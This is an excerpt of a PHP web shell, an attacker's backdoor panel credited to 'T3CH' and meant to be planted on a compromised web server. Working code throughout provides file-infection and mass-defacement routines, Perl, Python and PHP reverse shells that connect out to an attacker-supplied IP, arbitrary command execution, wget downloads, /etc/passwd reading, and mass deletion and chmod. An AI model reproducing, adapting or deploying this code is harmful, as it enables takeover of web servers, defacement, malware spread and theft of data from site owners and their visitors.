  608. $basename = pathinfo($dirname, PATHINFO_BASENAME);
  609. if(preg_match('/'.$searchval.'/', $basename)) {
  610. echo "<a href='?dir=$dirname'>$dirname</a><br>";
  611. }
  612. }
  613. }
  615. //Config Finder
  616. if(isset($_GET['configFinder'])) {
  617. echo "Search results that contain 'config' in file names.<br>";
  618. foreach(mass_files($rootdir, false) as $key => $filename) {
  619. $basename = pathinfo($filename, PATHINFO_BASENAME);
  620. if(preg_match('/config/', $basename)) {
  621. echo "<a href='?edit=$filename'>$filename</a><br>";
  622. }
  623. }
  624. echo "<br>Search results that contain 'config' in directory names.<br>";
  625. foreach(mass_files($rootdir, true) as $key => $filename) {
  626. $basename = pathinfo($filename, PATHINFO_BASENAME);
  627. if(preg_match('/config/', $basename)) {
  628. echo "<a href='?edit=$filename'>$filename</a><br>";
  629. }
  630. }
  631. }
  633. //Admin Finder
  634. if(isset($_GET['adminFinder'])) {
  635. echo "Search results that contain 'admin' in directory names.<br>";
  636. foreach(mass_files($rootdir, true) as $key => $filename) {
  637. $basename = pathinfo($filename, PATHINFO_BASENAME);
  638. if(preg_match('/admin/', $basename)) {
  639. echo "<a href='?edit=$filename'>$filename</a><br>";
  640. }
  641. }
  642. echo "<br>Search results that contain 'admin' in file names.<br>";
  643. foreach(mass_files($rootdir, false) as $key => $filename) {
  644. $basename = pathinfo($filename, PATHINFO_BASENAME);
  645. if(preg_match('/admin/', $basename)) {
  646. echo "<a href='?edit=$filename'>$filename</a><br>";
  647. }
  648. }
  649. }
  651. //Reverse IP
  652. if(isset($_GET['reverseIP'])) {
  653. echo "<center>
  654. <form action='http://www.my-ip-neighbors.com/' method='post'>
  655. <div id='container1'>
  656. <div id='content1'>
  657. Domain Name or IP Address:
  658. </div>
  659. </div>
  660. <input type='text' size='50' name='domain' vlue='".$_SERVER['SERVER_ADDR']."' />
  661. <input type='submit' name='submit' value='Search' />
  662. </form>
  663. </center>";
  664. }
  666. //Hash Generator
  667. if(isset($_GET['hashGenerator'])) {
  668. echo "<center>
  669. <form action='' method='post'>
  670. String to hash:<br>
  671. <input type='text' name='string'>
  672. <input type='submit' name='generate_hashes' value='Hash'>
  673. </form>
  674. </center>";
  675. }
  676. if(isset($_POST['generate_hashes'])) {
  677. $string = $_POST['string'];
  678. $md5 = md5($string);
  679. $md52 = md5(md5($string));
  680. $md53 = md5(md5(md5($string)));
  681. $sha1 = sha1($string);
  682. $sha12 = sha1(sha1($string));
  683. $sha13 = sha1(sha1(sha1($string)));
  684. $joomlasalt = salt_gen("4");
  685. $joomlahash = md5($string.$joomlasalt);
  686. $oscommsalt = salt_gen("2");
  687. $oscommhash = md5($oscommsalt.$string);
  688. $vbsalt = salt_gen("3");
  689. $vbhash = md5(md5($string).$vbsalt);
  690. $vbsalt2 = salt_gen("30");
  691. $vbhash2 = md5(md5($string).$vbsalt2);
  692. $mybbsalt = salt_gen("8");
  693. $mybbhash = md5(md5($mybbsalt).md5($string));
  694. $mybbsalt2 = salt_gen("8");
  695. $mybbhash2 = md5(md5($mybbsalt2).$string);
  696. $ipbsalt = salt_gen("5");
  697. $ipbhash = md5(md5($ipbsalt).md5($string));
  698. echo "<center>
  699. <textarea cols='120' rows='25' readonly>";
  700. echo 'md5($pass): '.$md5."\n";
  701. echo 'md5(md5($pass)): '.$md52."\n";
  702. echo 'md5(md5(md5($pass))): '.$md53."\n";
  703. echo 'sha1($pass): '.$sha1."\n";
  704. echo 'sha1(sha1($pass)): '.$sha12."\n";
  705. echo 'sha1(sha1(sha1($pass))): '.$sha13."\n";
  706. echo 'md5($pass.$salt) (Joomla): '.$joomlahash.':'.$joomlasalt."\n";
  707. echo 'md5($salt.$pass) (osCommerce): '.$oscommhash.':'.$oscommsalt."\n";
  708. echo 'md5(md5($pass).$salt) (vBulletin < 3.8.5): '.$vbhash.':'.$vbsalt."\n";
  709. echo 'md5(md5($pass).$salt) (vBulletin >= 3.8.5): '.$vbhash2.':'.$vbsalt2."\n";
  710. echo 'md5(md5($salt).$pass) (MyBB < 1.2): '.$mybbhash2.':'.$mybbsalt2."\n";
  711. echo 'md5(md5($salt).md5($pass)) (MyBB 1.2+): '.$mybbhash.':'.$mybbsalt."\n";
  712. echo 'md5(md5($salt).md5($pass)) (IPB 2+): '.$ipbhash.':'.$ipbsalt."\n";
  713. echo "</textarea>
  714. </center>";
  715. }
  717. //Extract Files
  718. if(isset($_GET['extract'])) {
  719. $file = $_GET['extract'];
  720. $epath = $_GET['epath'];
  721. $type = $_GET['type'];
  722. extract_file($file, $epath, $type);
  723. }
  725. //Infect Files
  726. if(isset($_POST['do_infect'])) {
  727. $infdir = rtrim($_POST['infect_dir'], '/');
  728. $type = $_POST['infect_type'];
  729. $infcode = $_POST['infect_code'];
  730. if(is_dir($infdir)) {
  731. $success = 0;
  732. $failed = 0;
  733. foreach(mass_files($infdir, false) as $key => $files) {
  734. $exten = pathinfo($files, PATHINFO_EXTENSION);
  735. if($type == 'php') {
  736. if($exten == 'php') {
  737. $content = $infcode;
  738. $content .= file_get_contents($files);
  739. if(file_put_contents($files, $content)) {
  740. echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
  741. $success++;
  742. } else {
  743. echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
  744. $failed++;
  745. }
  746. }
  747. } elseif($type == 'html') {
  748. if($exten == 'html') {
  749. $content = $infcode;
  750. $content .= file_get_contents($files);
  751. if(file_put_contents($files, $content)) {
  752. echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
  753. $success++;
  754. } else {
  755. echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
  756. $failed++;
  757. }
  758. }
  759. } elseif($type == 'both') {
  760. if($exten == 'html' or $exten == 'php') {
  761. $content = $infcode;
  762. $content .= file_get_contents($files);
  763. if(file_put_contents($files, $content)) {
  764. echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
  765. $success++;
  766. } else {
  767. echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
  768. $failed++;
  769. }
  770. }
  771. }
  772. }
  773. echo "A total of $success files were infected!<br>A total of $failed files failed to be infected!";
  774. } else {
  775. error("$infdir is not a valid directory!");
  776. }
  777. }
  778. if(isset($_GET['fileInfect'])) {
  779. echo "<center>
  780. This will append your infect code to the top of every file in the given directory.<br>
  781. <form action='' method='post'>
  782. Directory to infect: <input type='text' name='infect_dir' value='$rootdir'>
  783. File types to infect:
  784. <select name='infect_type'>
  785. <option value='php'>PHP</option>
  786. <option value='html'>HTML</option>
  787. <option value='both'>Both</option>
  788. </select><br>
  789. Code to infect files with:<br>
  790. <textarea name='infect_code' cols='110' rows='20'></textarea><br>
  791. <input type='submit' name='do_infect' value='Infect'>
  792. </form>
  793. </center>";
  794. }
  796. //Deface Files
  797. if(isset($_POST['do_deface'])) {
  798. $defdir = rtrim($_POST['deface_dir'], '/');
  799. $type = $_POST['deface_type'];
  800. $defsource = $_POST['deface_source'];
  801. if(is_dir($defdir)) {
  802. $success = 0;
  803. $failed = 0;
  804. foreach(mass_files($defdir, false) as $key => $files) {
  805. $exten = pathinfo($files, PATHINFO_EXTENSION);
  806. if($type == 'php') {
  807. if($exten == 'php') {
  808. if($files != __FILE__) {
  809. if(file_put_contents($files, $defsource)) {
  810. echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
  811. $success++;
  812. } else {
  813. echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
  814. $failed++;
  815. }
  816. }
  817. }
  818. } elseif($type == 'html') {
  819. if($exten == 'html') {
  820. if($files != __FILE__) {
  821. if(file_put_contents($files, $defsource)) {
  822. echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
  823. $success++;
  824. } else {
  825. echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
  826. $failed++;
  827. }
  828. }
  829. }
  830. } elseif($type == 'both') {
  831. if($exten == 'html' or $exten == 'php') {
  832. if($files != __FILE__) {
  833. if(file_put_contents($files, $defsource)) {
  834. echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
  835. $success++;
  836. } else {
  837. echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
  838. $failed++;
  839. }
  840. }
  841. }
  842. }
  843. }
  844. echo "A total of $success files were defaced!<br>A total of $failed files failed to be defaced!";
  845. } else {
  846. error("$defdir is not a valid directory!");
  847. }
  848. }
  849. if(isset($_GET['fileDeface'])) {
  850. echo "<center>
  851. This will deface every file in the given directory. This will not deface this shell.<br>
  852. <form action='' method='post'>
  853. Directory to deface: <input type='text' name='deface_dir' value='$rootdir'>
  854. File types to deface:
  855. <select name='deface_type'>
  856. <option value='php'>PHP</option>
  857. <option value='html'>HTML</option>
  858. <option value='both'>Both</option>
  859. </select><br>
  860. Source to deface files with:<br>
  861. <textarea name='deface_source' cols='110' rows='20'></textarea><br>
  862. <input type='submit' name='do_deface' value='Deface'>
  863. </form>
  864. </center>";
  865. }
  867. //Back Connect
  868. if(isset($_POST['bcpl_connect'])) {
  869. $ip = $_POST['bcpl_ip'];
  870. $port = $_POST['bcpl_port'];
  871. if(can_exe()) {
  872. if(file_exists("/tmp/bc.pl")) {
  873. echo "<center>
  874. Trying to connect to $ip on port $port<br>
  875. The response from 'perl /tmp/bc.pl $ip $port' was:<br>
  876. <textarea cols='120' rows='25'>".exe_cmd("perl /tmp/bc.pl $ip $port")."</textarea>
  877. </center>";
  878. } else {
  879. error("/tmp/bc.pl does not exist!");
  880. }
  881. } else {
  882. error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
  883. }
  884. }
  885. if(isset($_GET['bcPerl'])) {
  886. if(can_exe()) {
  887. if(is_dir('/tmp')) {
  888. if(file_put_contents('/tmp/bc.pl', base64_decode($bcpl))) {
  889. success("Successfully wrote /tmp/bc.pl!");
  890. echo "<center>
  891. <form action='' method='post'>
  892. IP: <input type='text' name='bcpl_ip' value='$yourip'>
  893. Port: <input type='text' name='bcpl_port' value='2121' size='3'>
  894. <input type='submit' name='bcpl_connect' value='Connect'><br>
  895. Use: 'nc -l -v -p PORT' Remember your port must be forwarded!
  896. </form>
  897. </center>";
  898. } else {
  899. error("Failed to write Perl source to /tmp/bc.pl!");
  900. }
  901. } else {
  902. error('/tmp is not a directory!');
  903. }
  904. } else {
  905. error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
  906. }
  907. }
  909. if(isset($_POST['bcpy_connect'])) {
  910. $ip = $_POST['bcpy_ip'];
  911. $port = $_POST['bcpy_port'];
  912. if(can_exe()) {
  913. if(file_exists("/tmp/bc.py")) {
  914. echo "<center>
  915. Trying to connect to $ip on port $port<br>
  916. The response from 'python /tmp/bc.py $ip $port' was:<br>
  917. <textarea cols='120' rows='25'>".exe_cmd("python /tmp/bc.py $ip $port")."</textarea>
  918. </center>";
  919. } else {
  920. error("/tmp/bc.py does not exist!");
  921. }
  922. } else {
  923. error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
  924. }
  925. }
  926. if(isset($_GET['bcPython'])) {
  927. if(can_exe()) {
  928. if(is_dir("/tmp")) {
  929. if(file_put_contents('/tmp/bc.py', base64_decode($bcpy))) {
  930. success("Successfully wrote /tmp/by.py");
  931. echo "<center>
  932. <form action='' method='post'>
  933. IP: <input type='text' name='bcpy_ip' value='$yourip'>
  934. Port: <input type='text' name='bcpy_port' value='2121' size='3'>
  935. <input type='submit' name='bcpy_connect' value='Connect'><br>
  936. Use 'nc -l -v -p PORT' Remember your port must be forwarded!
  937. </form>
  938. </center>";
  939. } else {
  940. error("Failed to write Python source to /tmp/by.py");
  941. }
  942. } else {
  943. error("/tmp is not a directory!");
  944. }
  945. } else {
  946. error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
  947. }
  948. }
  950. if(isset($_POST['bcphp_connect'])) {
  951. $ip = $_POST['bcphp_ip'];
  952. $port = $_POST['bcphp_port'];
  953. echo "<center>Trying to connect!</center>";
  954. $sockopen = fsockopen($ip , $port , $errno, $errstr);
  955. if(!$sockopen) {
  956. error("Failed to open socket!");
  957. } elseif($errno != 0) {
  958. error("$errno: $errstr");
  959. } else {
  960. fputs($sockopen, "\n[+]PHP Back Connection[+]\n\n");
  961. $uname = exe_cmd("uname -a");
  962. $id = exe_cmd("id");
  963. fputs($sockopen, "$uname$id\n");
  964. while(!feof($sockopen)) {
  965. fputs($sockopen, "> ");
  966. $command = fgets($sockopen);
  967. fputs($sockopen , exe_cmd($command));
  968. }
  969. fclose($sockopen);
  970. }
  971. }
  972. if(isset($_GET['bcPHP'])) {
  973. if(can_exe()) {
  974. echo "<center>
  975. <form action='' method='post'>
  976. IP: <input type='text' name='bcphp_ip' value='$yourip'>
  977. Port: <input type='text' name='bcphp_port' value='2121' size='3'>
  978. <input type='submit' name='bcphp_connect' value='Connect'><br>
  979. Use 'nc -l -v -p PORT' Remember your port must be forwarded!
  980. </form>
  981. </center>";
  982. } else {
  983. error("Can not execute commands! Commands need to be executed for this reverse shell to work!");
  984. }
  985. }
  987. //System
  988. if(isset($_GET['users'])) {
  989. if(file_exists('/etc/passwd')) {
  990. $getfile = file_get_contents('/etc/passwd');
  991. $exline = explode("\n", $getfile);
  992. echo "<table>
  993. <tr>
  994. <th>Username</th>
  995. <th>Password?</th>
  996. <th>UID</th>
  997. <th>GID</th>
  998. <th>UID Info</th>
  999. <th>Home Directory</th>
  1000. <th>Command/Shell</th>
  1001. </tr>";
  1002. foreach($exline as $exl) {
  1003. echo "<tr>";
  1004. $excol = explode(":", $exl);
  1005. foreach($excol as $exc) {
  1006. echo "<td>$exc</td>";
  1007. }
  1008. echo "</tr>";
  1009. }
  1010. echo "</table>";
  1011. } else {
  1012. error("/etc/passwd does not exist!");
  1013. }
  1014. }
  1016. if(isset($_GET['processes'])) {
  1017. if(can_exe()) {
  1018. $processes = exe_cmd("ps aux");
  1019. $stripfirstline = substr($processes, strpos($processes, "\n")+1);
  1020. $exline = explode("\n", $stripfirstline);
  1021. echo "<div id='hover'>
  1022. <table width='100%' border='1'>
  1023. <tr>
  1024. <th>Kill</th>
  1025. <th>USER</th>
  1026. <th>PID</th>
  1027. <th>%CPU</th>
  1028. <th>%MEM</th>
  1029. <th>VSZ</th>
  1030. <th>RSS</th>
  1031. <th>TTY</th>
  1032. <th>STAT</th>
  1033. <th>START</th>
  1034. <th>TIME</th>
  1035. <th>COMMAND</th>
  1036. </tr>";
  1037. foreach($exline as $exl) {
  1038. echo "<tr>";
  1039. $exsp = array_values(array_filter(explode(" ", $exl), 'strlen'));
  1040. if(count($exsp) > 11) {
  1041. $slice = array_slice($exsp, 0, 10);
  1042. echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
  1043. foreach($slice as $s) {
  1044. echo "<td>$s</td>";
  1045. }
  1046. $slice2 = array_slice($exsp, 10);
  1047. echo "<td>".implode(" ", $slice2)."</td>";
  1048. } else {
  1049. echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
  1050. foreach($exsp as $e) {
  1051. echo "<td>$e</td>";
  1052. }
  1053. }
  1054. echo "</tr>";
  1055. }
  1056. echo "</table></div>";
  1057. } else {
  1058. error("Can not execute commands! Must execute 'ps aux' to get processes.");
  1059. }
  1060. }
  1062. if(isset($_GET['memory'])) {
  1063. if(file_exists('/proc/meminfo')) {
  1064. $raminfo = file_get_contents('/proc/meminfo');
  1065. echo "Ram:<br><pre>$raminfo</pre><br><br>";
  1066. } else {
  1067. error("/proc/meminfo does not exist!");
  1068. }
  1069. $hddfree = disk_free_space("/");
  1070. $hddtotal = disk_total_space("/");
  1071. $hddused = $hddtotal - $hddfree;
  1072. $hddpercent = round(($hddused / $hddtotal) * 100);
  1073. echo "HDD:<br>Total Space: ".ByteConversion($hddtotal)."<br>Free Space: ".ByteConversion($hddfree)."<br>Used Space: ".ByteConversion($hddused)."<br>Percent Used: ~$hddpercent%";
  1074. }
  1076. if(isset($_GET['cpu'])) {
  1077. if(file_exists('/proc/cpuinfo')) {
  1078. $cpuinfo = file_get_contents('/proc/cpuinfo');
  1079. echo "<center>
  1080. CPU Information:<br>
  1081. <textarea cols='120' rows='20'>$cpuinfo</textarea>
  1082. </center>";
  1083. } else {
  1084. error('/proc/cpuinfo does not exist!');
  1085. }
  1086. }
  1088. //Execute Command
  1089. if(isset($_POST['exe_cmd'])) {
  1090. $command = $_POST['command'];
  1091. if(can_exe()) {
  1092. echo "<center>
  1093. <form action='' method='post'>
  1094. <input type='text' name='command' size='75'>
  1095. <input type='submit' name='exe_cmd'>
  1096. </form>
  1097. The response from '$command' was:<br>
  1098. <textarea cols='100' rows='20'>".exe_cmd($command)."</textarea>
  1099. </center>";
  1100. } else {
  1101. error("Can not execute commands!");
  1102. }
  1103. }
  1105. //Create File
  1106. if(isset($_POST['create_file'])) {
  1107. $createpath = $_POST['create_file_path'];
  1108. if(!file_exists($createpath)) {
  1109. if(fopen($createpath, "w+")) {
  1110. redirect("?edit=$createpath");
  1111. } else {
  1112. error("Failed to create file!");
  1113. }
  1114. } else {
  1115. error("File already exists! You can view it <a href='?edit=$createpath'>here</a>.");
  1116. }
  1117. }
  1118. //Create Directory
  1119. if(isset($_POST['create_dir'])) {
  1120. $dirpath = $_POST['create_dir_path'];
  1121. if(!is_dir($dirpath)) {
  1122. if(mkdir($dirpath, 0777)) {
  1123. redirect("?dir=$dirpath");
  1124. } else {
  1125. error("Failed to make directory!");
  1126. }
  1127. } else {
  1128. error("This directory already exists! You can view it <a href='?dir=$dirpath'>here</a>.");
  1129. }
  1130. }
  1132. //Wget File
  1133. if(isset($_POST['do_wget'])) {
  1134. $fileurl = $_POST['wget_file'];
  1135. if(can_exe()) {
  1136. echo "<center>
  1137. The response from 'wget $fileurl' was:<br>
  1138. <textarea cols='120' rows='20'>".exe_cmd("wget $fileurl")."</textarea>
  1139. </center>";
  1140. } else {
  1141. error("Commands can not be executed!");
  1142. }
  1143. }
  1145. //Upload File
  1146. if(isset($_POST['do_upload'])) {
  1147. $uploaddir = $_POST['upload_dir'];
  1148. $uploadname = $_FILES['upload_file']['name'];
  1149. if(!file_exists("$uploaddir/$uploadname")) {
  1150. if(move_uploaded_file($_FILES['upload_file']['tmp_name'], "$uploaddir/$uploadname")) {
  1151. redirect("?dir=$uploaddir");
  1152. } else {
  1153. error("Failed to upload file!");
  1154. }
  1155. } else {
  1156. error("File already exists! You can view it <a href='?edit=$uploaddir$uploadname'>here</a>.");
  1157. }
  1158. }
  1160. //Mass Files
  1161. if(isset($_POST['mass_action'])) {
  1162. $action = $_POST['action'];
  1163. $checked = $_POST['massbox'];
  1164. if($action == 'delete') {
  1165. foreach($checked as $c) {
  1166. if(is_dir($c)) {
  1167. if(rmdir($c)) {
  1168. echo "<font color='green'><b>Successfully deleted directory: $c</font><br>";
  1169. } else {
  1170. echo "<font color='red'><b>Failed to delete directory: $c</font><br>";
  1171. }
  1172. } else {
  1173. if(unlink($c)) {
  1174. echo "<font color='green'><b>Successfully deleted file: $c</font><br>";
  1175. } else {
  1176. echo "<font color='red'><b>Failed to delete file: $c</font><br>";
  1177. }
  1178. }
  1179. }
  1180. } elseif($action == 'chmod') {
  1181. $chvalue = $_POST['chmod_value'];
  1182. foreach($checked as $c) {
  1183. if(chmod($c, $chvalue)) {
  1184. echo "<font color='red'><b>Successfully chmod'd file: $c to: $chvalue</font><br>";
  1185. } else {
  1186. echo "<font color='red'><b>Failed to chmod file: $c to: $chvalue</font><br>";
  1187. }
  1188. }
  1189. } else {
  1190. error('Invalid action specified!');
  1191. }
  1192. }
  1194. //Display Disabled Functions
  1195. if(isset($_GET['disabledFunctions'])) {
  1196. echo "Disabled functions:<br>";
  1197. $ex = explode(",", $disabledfunc);
  1198. foreach($ex as $e) {
  1199. echo "$e<br>";
  1200. }
  1201. }
  1203. //Kill Process
  1204. if(isset($_GET['killProcess'])) {
  1205. $id = $_GET['killProcess'];
  1206. if(posix_kill($id)) {
  1207. success("Successfully killed process: $id");
  1208. } else {
  1209. error("Failed to kill process: $id");
  1210. }
  1211. }
  1213. //Check Links
  1214. if(isset($_GET['checkLinks'])) {
  1215. echo "<table border='1'>
  1216. <tr>
  1217. <th>Link</th>
  1218. <th>Status</th>
  1219. <th>MD5</th>
  1220. <th>Description</td>
  1221. </tr>";
  1222. foreach($links as $key => $ar) {
  1223. $link = $ar['LINK'];
  1224. $md5 = $ar['MD5'];
  1225. $desc = $ar['DESC'];
  1226. $headers = @get_headers($link);
  1227. echo "<tr>";
  1228. echo "<td><a href='$link'>$link</a></td>";
  1229. if($headers[0] != "HTTP/1.1 403 FORBIDDEN" or $headers[0] != "HTTP/1.1 404 Not Found") {
  1230. echo "<td><font color='green'><b>OK</b></font></td>";
  1231. } else {
  1232. echo "<td><font color='red'><b>Not Found</b></font></td>";
  1233. }
  1234. if(md5_file($link) == $md5) {
  1235. echo "<td><font color='green'><b>Match</b></font></td>";
  1236. } else {
  1237. echo "<td><font color='red'><b>No Match</b></font></td>";
  1238. }
  1239. echo "<td>$desc</td>";
  1240. echo "</tr>";
  1241. }
  1242. echo "</table>";
  1243. }
  1245. //Credits
  1246. if(isset($_GET['credits'])) {
  1247. echo "<center>
  1248. <div id='container'>
  1249. <div id='content'>
  1250. <font size='6'><b>$version Shell</font></b><br>
  1251. Developed By: T3CH (@t3chfl4r3 or t3chfl4r3@gmail)<br>
  1252. Nav Bar: Bootstrap (<a href='http://getbootstrap.com/'>http://getbootstrap.com/</a>)<br>
  1253. Perl Reverse Shell: pentestmonkey@pentestmonkey.net<br>
  1254. Python Reverse Shell: Xavier Garcia (<a href='http://www.shellguardians.com'>http://www.shellguardians.com</a>)
  1255. </div>
  1256. </div>
  1257. </center>";
  1258. }
  1260. //Kill
  1261. if(isset($_GET['kill'])) {
  1262. if(unlink(__FILE__)) {
  1263. success("Successfully killed shell!");
  1264. } else {
  1265. error("Failed to kill shell!");
  1266. }
  1267. }
  1269. //Get Files & Directories from Current Directory
  1270. $open = opendir($dir);
  1271. $files = array();
  1272. $direcs = array();
  1273. while ($file = readdir($open)) {
  1274. if ($file != "." && $file != "..") {
  1275. if (is_dir("$dir/$file")) {
  1276. array_push($direcs, $file);
  1277. } else {
  1278. array_push($files, $file);
  1279. }
  1280. }
  1281. }
  1282. asort($direcs);
  1283. asort($files);
  1285. //Display Files and Directories
  1286. echo <<<html
  1287. <br><br>
  1288. <table width='100%' border='1'>
  1289. <tr>
  1290. <th>Current Directory:
  1291. html;
  1292. $ex = explode("/", $dir);
  1293. for ($p = 0; $p < count($ex); $p++) {
  1294. @$linkpath.=$ex[$p] . '/';
  1295. $linkpath2 = rtrim($linkpath, "/");
  1296. echo "<a href='?dir=$linkpath2'>$ex[$p]</a>/";
  1297. }
  1298. echo <<<html
  1299. </th>
  1300. </tr>
  1301. </table>
  1303. <form action='' method='post'>
  1304. <div id="hover">
  1305. <table width='100%' border='1'>
  1306. <tr>
  1307. <th>File/Dir Name</th>
  1308. <th>Permissions</th>
  1309. <th>Writeable</th>
  1310. <th>Owner/Group</th>
  1311. <th>Size</th>
  1312. <th>Last Modified</th>
  1313. <th>Delete</th>
  1314. <th>Rename</th>
  1315. <th>Mass</th>
  1316. </tr>
  1317. html;
  1318. //Display Directories
  1319. foreach($direcs as $dirs) {
  1320. $perms = substr(base_convert(fileperms("$dir/$dirs"), 10, 8), 2);
  1321. $writeable = is_writeable("$dir/$dirs") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
  1322. $owner = fileowner("$dir/$dirs");
  1323. $group = filegroup("$dir/$dirs");
  1324. $size = "Directory";
  1325. $lastmod = date("F d Y g:i:s", filemtime("$dir/$dirs"));
  1326. echo <<<html
  1327. <tr>
  1328. <td><a href='?dir=$dir/$dirs'>$dirs</a></td>
  1329. <td style="text-align: center;">$perms</td>
  1330. <td style="text-align: center;">$writeable</td>
  1331. <td style="text-align: center;">$owner/$group</td>
  1332. <td>$size</td>
  1333. <td>$lastmod</td>
  1334. <td><a href='?delD=$dir/$dirs'>Delete</a></td>
  1335. <td><a href='?rename=$dirs&rdir=$dir'>Rename</a></td>
  1336. <td><input type='checkbox' name='massbox[]' value='$dir/$dirs'></td>
  1337. </tr>
  1338. html;
  1339. }
  1341. //Display Files
  1342. foreach($files as $file) {
  1343. $perms = substr(base_convert(fileperms("$dir/$file"), 10, 8), 2);
  1344. $writeable = is_writeable("$dir/$file") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
  1345. $owner = fileowner("$dir/$file");
  1346. $group = filegroup("$dir/$file");
  1347. $size = ByteConversion(filesize("$dir/$file"));
  1348. $lastmod = date("F d Y g:i:s", filemtime("$dir/$file"));
  1349. $extension = pathinfo("$dir/$file", PATHINFO_EXTENSION);
  1350. echo "<tr>";
  1351. if(in_array($extension, $compression)) {
  1352. echo "<td><a href='?extract=$dir/$file&epath=$dir&type=$extension'>$file</a></td>";
  1353. } else {
  1354. echo "<td><a href='?edit=$dir/$file'>$file</a></td>";
  1355. }
  1356. echo <<<html
  1357. <td style="text-align: center;">$perms</td>
  1358. <td style="text-align: center;">$writeable</td>
  1359. <td style="text-align: center;">$owner/$group</td>
  1360. <td>$size</td>
  1361. <td>$lastmod</td>
  1362. <td><a href='?delF=$dir/$file'>Delete</a></td>
  1363. <td><a href='?rename=$file&rdir=$dir'>Rename</a></td>
  1364. <td><input type='checkbox' name='massbox[]' value='$dir/$file'></td>
  1365. </tr>
  1366. html;
  1367. }
  1368. echo <<<html
  1369. </table>
  1370. </div>
  1371. <div style='position:absolute; right:0%;'>
  1372. <select name='action'>
  1373. <option value='delete'>Delete</option>
  1374. <option value='chmod'>chmod</option>
  1375. </select>
  1376. <input type='text' name='chmod_value' class='text' value='077' size='9'>
  1377. <input type='submit' name='mass_action' value='Do Action'>
  1378. </div>
  1379. </form>
  1380. <br>
  1381. <br>
  1382. <br>
  1383. html;
  1385. if(is_writeable($dir)) {
  1386. $writeable = "<font color='green'><b>[ Writeable ]</b></font>";
  1387. } else {
  1388. $writeable = "<font color='red'><b>[ Not Writeable ]</b></font>";
  1389. }
  1390. echo "<table width='100%' border='1'>
  1391. <tr>
  1392. <td>
  1393. <center>
  1394. <form action='' method='post'>
  1395. Create File:<br>
  1396. <input type='text' name='create_file_path' size='55' value='$dir/newfile.php'>
  1397. <input type='submit' name='create_file' value='Create'><br>
  1398. $writeable
  1399. </form>
  1400. </center>
  1401. </td>
  1402. <td>
  1403. <center>
  1404. <form action='' method='post'>
  1405. Create Directory:<br>
  1406. <input type='text' name='create_dir_path' size='55' value='$dir/newdir'>
  1407. <input type='submit' name='create_dir' value='Create'><br>
  1408. $writeable
  1409. </form>
  1410. </center>
  1411. </td>
  1412. </tr>
  1413. <tr>
  1414. <td>
  1415. <center>
  1416. <form action='' method='get'>
  1417. Edit File:<br>
  1418. <input type='text' name='edit' size='55' value='$dir/index.php'>
  1419. <input type='submit' value='Edit'>
  1420. </form>
  1421. </center>
  1422. </td>
  1423. <td>
  1424. <center>
  1425. <form action='' method='get'>
  1426. Go To Directory:<br>
  1427. <input type='text' name='dir' size='55' value='/tmp'>
  1428. <input type='submit' value='Go'>
  1429. </form>
  1430. </center>
  1431. </td>
  1432. </tr>
  1433. <tr>
  1434. <td>
  1435. <center>
  1436. <form action='' method='post' enctype='multipart/form-data'>
  1437. Upload To Directory:<br>
  1438. <input type='text' name='upload_dir' size='55' value='$dir'><br>
  1439. <input type='file' name='upload_file'>
  1440. <input type='submit' name='do_upload' value='Upload'><br>
  1441. $writeable
  1442. </form>
  1443. </center>
  1444. </td>
  1445. <td>
  1446. <center>
  1447. <form action='' method='post'>
  1448. wget file:<br>
  1449. <input type='text' name='wget_file' size='55' value='http://'>
  1450. <input type='submit' name='do_wget' value='wget'>
  1451. </form>
  1452. </center>
  1453. </td>
  1454. </tr>
  1455. <tr>
  1456. <td colspan='2'>
  1457. <center>
  1458. <form action='' method='post'>
  1459. Execute Command:<br>
  1460. <input type='text' name='command' size='65'>
  1461. <input type='submit' name='exe_cmd' value='Execute'>
  1462. </form>
  1463. </center>
  1464. </td>
  1465. </tr>
  1466. </table>
  1467. <br>
  1468. <br>";
  1470. ?>
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